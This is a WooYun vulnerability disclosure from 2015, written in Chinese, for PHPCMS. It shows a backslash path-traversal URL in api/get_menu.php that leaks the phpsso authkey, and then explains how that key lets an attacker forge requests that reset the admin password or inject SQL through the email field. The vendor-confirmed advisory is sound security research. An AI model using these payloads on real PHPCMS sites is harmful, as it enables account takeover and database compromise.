当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105242

漏洞标题:PHPCMS最新版本authkey泄露可注射拿shell

相关厂商:phpcms

漏洞作者: GLM_

提交时间:2015-04-01 17:23

修复时间:2015-06-30 17:38

公开时间:2015-06-30 17:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向第三方安全合作伙伴开放
2015-05-26: 细节向核心白帽子及相关领域专家公开
2015-06-05: 细节向普通白帽子公开
2015-06-15: 细节向实习白帽子公开
2015-06-30: 细节向公众公开

简要描述:

authkey泄露可以导致一系列安全问题

详细说明:

WooYun: PHPCMS V9 一个为所欲为的漏洞
可以参考这篇文章,这这篇文章的作者爆了这样一个点

public function getapplist() {
		$applist = getcache('applist', 'admin');
		exit(serialize($applist));
	}


厂商同学直接忽略了,但是却自己修复了(不评论),修复为

public function getapplist() {
		$applist = getcache('applist', 'admin');
		foreach($applist as $key=>$value){
			unset($applist[$key]['authkey']);
		}
		exit(serialize($applist));


修复得很不仔细,看来厂商真的觉得这不是个洞。好啊,那么肯定就会有其它点了,既然不重视这个点,我们来看\api\get_menu.php:

function ajax_getlist() {
	$cachefile = $_GET['cachefile'];
	$cachefile = str_replace(array('/', '//'), '', $cachefile);
	//$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile);
	$path = $_GET['path'];
	$path = str_replace(array('/', '//'), '', $path);
	//$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path);
	$title = $_GET['title'];
	$key = $_GET['key'];
	$infos = getcache($cachefile,$path);
	$where_id = intval($_GET['parentid']);
	$parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);
	foreach($infos AS $k=>$v) {
		if($v['parentid'] == $where_id) {
			if ($v['parentid']) $parentid = $infos[$v['parentid']]['parentid'];
			$s[]=iconv(CHARSET,'utf-8',$v['catid'].','.trim($v[$key]).','.$v['parentid'].','.$parent_menu_name.','.$parentid);
		}
	}
	if(count($s)>0) {
		$jsonstr = json_encode($s);
		echo trim_script($_GET['callback']).'(',$jsonstr,')';
		exit;			
	} else {
		echo trim_script($_GET['callback']).'()';exit;			
	}
}


其中的getcache的两个参量是可控的。并且没有过滤反斜杠。构造合适的访问链接可以访问到cache文件夹中的配置文件,并读取内容。
那么如果这样的链接会督导什么内容呢?

http://www.test.org/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin


4.jpg


漏洞证明:

不过这里厂商又会忽略的。那么我们看看authkey怎么用
在\phpsso_server\phpcms\modules\phpsso\index.php中含有如下函数:

public function edit() {
		$this->email = isset($this->data['email']) ? $this->data['email'] : '';
		$this->uid = isset($this->data['uid']) ? $this->data['uid'] : '';
		$userinfo = $this->getuserinfo(1);
		
		if (isset($this->data['password']) && !empty($this->data['password'])) {
			$this->password = create_password($this->data['password'], $userinfo['random']);
		}
		
		$this->random = !empty($this->data['random']) ? $this->data['random'] : $userinfo['random'];
		if (isset($this->data['newpassword']) && !empty($this->data['newpassword'])) {
			$this->newpassword = create_password($this->data['newpassword'], $this->random);
		}
		if ($userinfo == -1) {
			exit('-1');
		}
		if (isset($this->password) && !empty($this->password) && $userinfo['password'] != $this->password) {
			exit('-2');
		}
		if ($this->email && $userinfo['email'] != $this->email) {
			if($this->checkemail(1) == -1) exit('-3');
		}	
		
		$data = array();
		$data['appname'] = $this->applist[$this->appid]['name'];
		
		if (!empty($this->email) && $userinfo['email'] != $this->email) {
			$data['email'] = $this->email;
		}
		if (isset($this->newpassword) && $userinfo['password'] != $this->newpassword) {
			$data['password'] = $this->newpassword;
			$data['random'] = $this->random;
		}
		if (!empty($data)) {
			
			//ucenter部份
			if ($this->config['ucuse']) {
				pc_base::load_config('uc_config');
				require_once PHPCMS_PATH.'api/uc_client/client.php';
				$r = uc_user_edit($userinfo['username'], '', (isset($this->data['newpassword']) && !empty($this->data['newpassword']) ? $this->data['newpassword'] : ''), $data['email'],1);
				if ($r != 1) {
				 //{-1:用户不存在;-2:旧密码错误;-3:email已经存在 ;1:成功;0:未作修改}
					switch ($r) {
						case '-1':
							exit('-2');
						break;
						case '0':				
						case '-4':						
						case '-5':						
						case '-6':
						case '-7':
						case '-8':
							exit('0');
						break;
					}
				}
			}
			if (empty($data['email'])) unset($data['email']);
		
			/*插入消息队列*/
			$noticedata = $data;
			$noticedata['uid'] = $userinfo['uid'];
			messagequeue::add('member_edit', $noticedata);
			if($this->username) {
				$res = $this->db->update($data, array('username'=>$this->username));
			} else {
				$res = $this->db->update($data, array('uid'=>$this->uid));
			}
			exit("$res");
		} else {
			exit('0');
		}
	}


里面有数据库的操作,应该是用于密码更改的。我们来构造一个data数据,加密前:

uid=1&newpassword=admin123456


利用上面的authkey以及cms自带的加解密函数即可进行加密。在这里,我们除了可以修改密码,还可以进行注入

uid=1&email=123'


修复方案:

不会修复

版权声明:转载请注明来源 GLM_@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-01 17:36

厂商回复:

感谢提交

最新状态:

暂无